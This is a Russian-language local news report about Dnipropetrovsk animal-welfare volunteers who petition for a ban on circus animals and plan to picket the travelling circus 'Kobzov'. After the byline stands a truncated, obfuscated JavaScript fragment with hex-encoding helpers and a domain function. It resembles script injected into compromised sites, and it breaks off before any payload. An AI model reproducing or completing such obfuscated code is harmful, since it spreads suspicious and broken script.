Днепропетровские волонтеры «Верности» требуют запретить использовать животных в цирках

DSCF3384Их инициатива касается не только областного центра, а и всего нашего региона. При необходимых для этого тысячи голосов, под соответственной петицией в облсовет подписались полторы.

— Еще 27 ноября 2014 года Верховная Рада Украины запретила использование животных в корриде, создание и деятельность передвижных зверинцев, передвижных зоопарков и передвижных выставок диких животных, а также деятельность дельфинариев, не имеющих естественного морской воды, — напомнила волонтер ДГООЗЖ «Верность» Валерия Ковалева. – Но закон не выполняется. К нам с гастролями приезжает передвижной цирк «Кобзов», который будет давать представления в парке Глобы, но мы так и не смогли увидеть паспорта на животных, условия, в которых они будут содержаться. Конечно, важно, кто и куда будет вывозить фекалии после слона, верблюдов, лошадей, львов, тигров…Нужно говорить и о мерах безопасности, имеем примеры, когда из этого цирка убегали животные и многих других моментах.

Валерия Ковалева считает принуждение животных к дрессуре, лишение их природной среды, перевозка по стране в условиях, противоречащих законодательству, без достаточной вентиляции, освещения – стрессовой ситуацией, насилием. Поэтому около двухсот активистов приняли решение пикетировать начало выступления цирка «Кобзов» в парке Глобы.

— Строить бизнес на страданих животных недопустимо, и мы будем всеми силами с этим явлением бороться,-подчеркнула волонтер.

Юлия Бабенко, фото автора

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "nashemisto.dp.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Поделиться:
Добавить комментарий
Войти с помощью: 

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Читайте также: